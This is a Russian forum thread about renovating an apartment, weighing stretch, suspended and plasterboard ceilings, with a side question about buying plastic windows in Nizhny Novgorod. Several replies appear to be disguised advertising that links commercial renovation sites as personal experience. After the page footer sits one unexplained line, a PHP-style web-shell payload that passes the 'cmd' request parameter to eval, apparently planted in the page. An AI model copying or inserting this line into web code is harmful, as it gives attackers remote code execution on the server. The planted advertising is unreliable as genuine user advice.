+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Делаю ремонт


  1. #1
    Мимо проходил Bimbom is on a distinguished road Аватар для Bimbom
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    .....
    Сообщений
    45

    Делаю ремонт

    На свою голову затеял ремонт в квартире. Собрались через месяц выезжать из Москвы в деревню на все лето, и я решил что осень нам будет приятно вернуться в квартиру с новым ремонтом. Вообщем, стены кое как до ума довел. Теперь нужно что-то придумать с потолком. Что посоветуете - натяжной, подвесной, многоуровневый из гипсокартона?

  2. #2
    Мимо проходил Arsenal is on a distinguished road Аватар для Arsenal
    Регистрация
    12.02.2019
    Откуда
    ......
    Машина
    ...
    Сообщений
    37
    С подвесным нужна большая высота потолка, иначе будете за него головой цепляться. Гипсокартон мне не нравится, с ним много мороки, а вот натяжной - то что надо. Его и монтировать не долго, и цена на него приемлемая, не разорительная. Вот сами прикиньте по калькулятору вот здесь во сколько вам обойдется натяжной потолок https://elit-lux.ru/

  3. #3
    Мимо проходил Kommunar is on a distinguished road Аватар для Kommunar
    Регистрация
    26.01.2019
    Откуда
    .....
    Машина
    .....
    Сообщений
    66
    У нас подвесной со встроенными светильниками. Мы выбрали такое цветовое решение, что оно уже пятый год актуально. Автор, если у вас еще месяц впереди, делайте подвесной - не пожалеете.

  4. #4
    Мимо проходил nekrolog is on a distinguished road Аватар для nekrolog
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    54
    А у меня красивый двухъярусный потолок из гипсокартона. Нам с женой поначалу казалось что конструкция слишком большая. но сейчас видим, что все нормально, не сильно она и перегружает пространство.

  5. #5
    Мимо проходил ViktorKirichev is on a distinguished road Аватар для ViktorKirichev
    Регистрация
    26.01.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    25
    В тему. Мне бы ещё по окнам совета услышать бы. Где купить ? Пластик желательно. Нижний Новгород или же область на крайняк. Благодарю

  6. #6
    Мимо проходил Leha-Leshiy is on a distinguished road Аватар для Leha-Leshiy
    Регистрация
    21.02.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    22
    Цитата Сообщение от ViktorKirichev Посмотреть сообщение
    В тему. Мне бы ещё по окнам совета услышать бы. Где купить ? Пластик желательно. Нижний Новгород или же область на крайняк. Благодарю
    Ну вот держите, как по заказу, повезло вам (как раз сам такой же вопрос решал) - каталог окон и дверей http://nn.satels-okna.ru/products/ заодно, лишним не будет. Ремонт мы тщательно планировали и совсем недавно с ним закончили. Вышло красиво и современно - и сам своим трудом доволен, и жене такое обновление жилища нашего по вкусу пришлось (она у меня в отъезде была, сюрприз получился)

  7. #7
    Новичок Meloun is on a distinguished road Аватар для Meloun
    Регистрация
    14.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    107
    Как всегда, всё упирается в деньги. Если они у вас есть в достатке, то, конечно, лучше всего делать многоуровневые. Это очень красиво, и будет большим сюрпризом для ваших домашних, когда они вернутся домой. Да чего там говорить, вот сами https://www.liderpotolok.ru/katalog/...zhnye-potolki/ примеры работ посмотрите. Ну красота же. У нас в зале такие потолки, так уже и привыкли к ним, но всё-равно восторгаемся.

  8. #8
    Мимо проходил Машка is on a distinguished road Аватар для Машка
    Регистрация
    25.08.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    12
    Решили сделать ремонт и реконструкцию частного дома. Заказывали такие услуги вот тут http://www.noviydom.ru/services/rekonstruktsiya-domov/. Сделали очень хорошо и качественно. Мы очень довольны.

+ Ответить в теме

Похожие темы

  1. Ремонт
    от Kommunar в разделе Семья и дом
    Ответов: 13
    Последнее сообщение: 29.10.2023, 06:36
  2. ремонт
    от Морган в разделе Golf 3
    Ответов: 3
    Последнее сообщение: 03.07.2023, 14:51
  3. Кап.ремонт или нет?
    от Pilot39 в разделе Двигатель
    Ответов: 3
    Последнее сообщение: 11.09.2019, 19:28
  4. Ремонт DSG
    от Shrek в разделе Украина
    Ответов: 18
    Последнее сообщение: 06.02.2013, 01:21
  5. Ремонт DSG
    от juks в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 28
    Последнее сообщение: 12.11.2010, 00:50

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}